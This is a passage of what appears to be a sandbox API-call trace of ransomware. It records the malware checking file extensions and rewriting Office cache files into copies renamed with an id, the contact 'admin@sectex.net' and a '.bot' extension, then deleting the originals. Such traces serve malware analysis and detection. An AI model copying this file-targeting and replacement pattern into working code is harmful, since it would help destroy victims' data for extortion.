	[0033.343] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1
	[0033.343] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.343] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.343] lstrlenW (lpString=".doc") returned 4
	[0033.343] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1
	[0033.343] lstrlenW (lpString=".docx") returned 5
	[0033.343] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1
	[0033.344] lstrlenW (lpString=".pdf") returned 4
	[0033.344] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1
	[0033.344] lstrlenW (lpString=".xls") returned 4
	[0033.344] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1
	[0033.344] lstrlenW (lpString=".xlsx") returned 5
	[0033.344] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1
	[0033.344] lstrlenW (lpString=".ppt") returned 4
	[0033.344] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1
	[0033.344] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.344] lstrlenW (lpString=".zip") returned 4
	[0033.344] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1
	[0033.344] lstrlenW (lpString=".rar") returned 4
	[0033.344] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1
	[0033.344] lstrlenW (lpString=".bz2") returned 4
	[0033.344] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1
	[0033.344] lstrlenW (lpString=".7z") returned 3
	[0033.344] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1
	[0033.344] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.344] lstrlenW (lpString=".dbf") returned 4
	[0033.344] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1
	[0033.344] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.344] lstrlenW (lpString=".1cd") returned 4
	[0033.344] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1
	[0033.344] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.345] lstrlenW (lpString=".jpg") returned 4
	[0033.345] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.345] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.345] lstrlenW (lpString=".doc") returned 4
	[0033.345] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString=".docx") returned 5
	[0033.345] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1
	[0033.345] lstrlenW (lpString=".pdf") returned 4
	[0033.345] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString=".xls") returned 4
	[0033.345] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString=".xlsx") returned 5
	[0033.345] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1
	[0033.345] lstrlenW (lpString=".ppt") returned 4
	[0033.345] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.345] lstrlenW (lpString=".zip") returned 4
	[0033.345] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString=".rar") returned 4
	[0033.345] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString=".bz2") returned 4
	[0033.345] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString=".7z") returned 3
	[0033.345] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1
	[0033.345] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.345] lstrlenW (lpString=".dbf") returned 4
	[0033.345] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1
	[0033.345] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.345] lstrlenW (lpString=".1cd") returned 4
	[0033.345] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1
	[0033.345] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0033.345] lstrlenW (lpString=".jpg") returned 4
	[0033.346] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1
	[0033.346] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.346] lstrlenW (lpString="ExcelMUI.xml") returned 12
	[0033.346] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.407] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1565) returned 1
	[0033.407] CloseHandle (hObject=0x18c) returned 1
	[0033.407] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020
	[0033.407] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.407] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.407] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.407] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.407] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.409] GetLastError () returned 0x0
	[0033.409] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x61d, lpOverlapped=0x0) returned 1
	[0033.410] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x620, lpOverlapped=0x0) returned 1
	[0033.411] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.411] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0033.411] SetEndOfFile (hFile=0x180) returned 1
	[0033.412] CloseHandle (hObject=0x180) returned 1
	[0033.412] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.412] SetEndOfFile (hFile=0x18c) returned 1
	[0033.413] CloseHandle (hObject=0x18c) returned 1
	[0033.413] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.414] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1
	[0033.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.414] lstrlenW (lpString=".doc") returned 4
	[0033.414] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.414] lstrlenW (lpString=".docx") returned 5
	[0033.414] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.414] lstrlenW (lpString=".pdf") returned 4
	[0033.414] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.414] lstrlenW (lpString=".xls") returned 4
	[0033.414] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.414] lstrlenW (lpString=".xlsx") returned 5
	[0033.414] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.414] lstrlenW (lpString=".ppt") returned 4
	[0033.414] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.414] lstrlenW (lpString=".zip") returned 4
	[0033.415] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.415] lstrlenW (lpString=".rar") returned 4
	[0033.415] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString=".bz2") returned 4
	[0033.415] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString=".7z") returned 3
	[0033.415] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.415] lstrlenW (lpString=".dbf") returned 4
	[0033.415] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.415] lstrlenW (lpString=".1cd") returned 4
	[0033.415] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.415] lstrlenW (lpString=".jpg") returned 4
	[0033.415] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.415] lstrlenW (lpString=".doc") returned 4
	[0033.415] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString=".docx") returned 5
	[0033.415] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.415] lstrlenW (lpString=".pdf") returned 4
	[0033.415] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString=".xls") returned 4
	[0033.415] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString=".xlsx") returned 5
	[0033.415] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.415] lstrlenW (lpString=".ppt") returned 4
	[0033.415] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.415] lstrlenW (lpString=".zip") returned 4
	[0033.415] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.415] lstrlenW (lpString=".rar") returned 4
	[0033.416] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.416] lstrlenW (lpString=".bz2") returned 4
	[0033.416] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.416] lstrlenW (lpString=".7z") returned 3
	[0033.416] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.416] lstrlenW (lpString=".dbf") returned 4
	[0033.416] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.416] lstrlenW (lpString=".1cd") returned 4
	[0033.416] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75
	[0033.416] lstrlenW (lpString=".jpg") returned 4
	[0033.416] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.416] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.416] lstrlenW (lpString="PowerPointMUI.xml") returned 17
	[0033.416] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.416] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1450) returned 1
	[0033.416] CloseHandle (hObject=0x18c) returned 1
	[0033.416] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020
	[0033.417] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.417] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.417] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.417] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.417] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.417] GetLastError () returned 0x0
	[0033.417] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5aa, lpOverlapped=0x0) returned 1
	[0033.419] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0033.419] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.420] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0033.420] SetEndOfFile (hFile=0x180) returned 1
	[0033.420] CloseHandle (hObject=0x180) returned 1
	[0033.420] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.421] SetEndOfFile (hFile=0x18c) returned 1
	[0033.421] CloseHandle (hObject=0x18c) returned 1
	[0033.421] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.423] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1
	[0033.423] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.423] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.423] lstrlenW (lpString=".doc") returned 4
	[0033.423] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.423] lstrlenW (lpString=".docx") returned 5
	[0033.424] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.424] lstrlenW (lpString=".pdf") returned 4
	[0033.424] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString=".xls") returned 4
	[0033.424] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString=".xlsx") returned 5
	[0033.424] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.424] lstrlenW (lpString=".ppt") returned 4
	[0033.424] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.424] lstrlenW (lpString=".zip") returned 4
	[0033.424] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.424] lstrlenW (lpString=".rar") returned 4
	[0033.424] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString=".bz2") returned 4
	[0033.424] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString=".7z") returned 3
	[0033.424] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.424] lstrlenW (lpString=".dbf") returned 4
	[0033.424] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.424] lstrlenW (lpString=".1cd") returned 4
	[0033.424] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.424] lstrlenW (lpString=".jpg") returned 4
	[0033.424] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.424] lstrlenW (lpString=".doc") returned 4
	[0033.424] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.424] lstrlenW (lpString=".docx") returned 5
	[0033.424] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.424] lstrlenW (lpString=".pdf") returned 4
	[0033.425] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.425] lstrlenW (lpString=".xls") returned 4
	[0033.425] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.425] lstrlenW (lpString=".xlsx") returned 5
	[0033.425] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.425] lstrlenW (lpString=".ppt") returned 4
	[0033.425] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.425] lstrlenW (lpString=".zip") returned 4
	[0033.425] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.425] lstrlenW (lpString=".rar") returned 4
	[0033.425] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.425] lstrlenW (lpString=".bz2") returned 4
	[0033.425] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.425] lstrlenW (lpString=".7z") returned 3
	[0033.425] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.425] lstrlenW (lpString=".dbf") returned 4
	[0033.425] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.425] lstrlenW (lpString=".1cd") returned 4
	[0033.425] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80
	[0033.425] lstrlenW (lpString=".jpg") returned 4
	[0033.425] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.425] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.425] lstrlenW (lpString="Setup.xml") returned 9
	[0033.425] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.426] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1886) returned 1
	[0033.426] CloseHandle (hObject=0x18c) returned 1
	[0033.426] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.426] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.426] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.426] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.426] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.426] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.426] GetLastError () returned 0x0
	[0033.426] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x75e, lpOverlapped=0x0) returned 1
	[0033.429] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x760, lpOverlapped=0x0) returned 1
	[0033.430] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.430] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.430] SetEndOfFile (hFile=0x180) returned 1
	[0033.430] CloseHandle (hObject=0x180) returned 1
	[0033.431] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.431] SetEndOfFile (hFile=0x18c) returned 1
	[0033.431] CloseHandle (hObject=0x18c) returned 1
	[0033.432] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
